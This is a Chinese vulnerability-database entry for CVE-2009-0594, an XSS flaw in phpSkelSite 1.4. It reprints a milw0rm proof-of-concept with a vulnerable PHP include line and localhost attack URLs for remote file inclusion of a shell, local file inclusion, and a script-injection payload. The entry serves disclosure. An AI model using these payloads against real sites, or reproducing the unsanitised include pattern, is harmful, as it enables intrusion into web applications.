Apmuthu phpSkelSite 'index.php'跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117186 漏洞类型 跨站脚本
发布时间 2009-01-02 更新时间 2009-02-17
CVE编号 CVE-2009-0594 CNNVD-ID CNNVD-200902-356
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/7648
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-356
|漏洞详情
phpSkelSite1.4版本的index.php中存在跨站脚本攻击漏洞。远程攻击者可以借助PATH_INFO,注入任意web脚本或HTML。
|漏洞EXP
-----------------:RFI/LFI/xss:-----------------
-------------------------------------------
script:phpSkelSite
   
------------------------------------------------------------------
download from:http://apmuthu.tripod.com/files/phpSkelSite_v1.4.zip
   
------------------------------------------------------------------

........................................................
vul:/skysilver/login.tpl.php line 1

<? include $theme.'/pageheading'.$TplSuffix ; ?>


------------------------------------------------------
Rfi:

http://127.0.0.1/path/skysilver/login.tpl.php?theme=[shell.txt?]

Lfi:

http://127.0.0.1/path/skysilver/login.tpl.php?TplSuffix=[lfi]

***************************************************
xss:
http://127.0.0.1/path/index.php/>"><ScRiPt>alert('ahmadbady')</ScRiPt>
***************************************************
---------------------
Author: ahmadbady
---------------------

# milw0rm.com [2009-01-02]
|参考资料

来源:BID
名称:33092
链接:http://www.securityfocus.com/bid/33092
来源:MILW0RM
名称:7648
链接:http://www.milw0rm.com/exploits/7648
来源:SECUNIA
名称:33382
链接:http://secunia.com/advisories/33382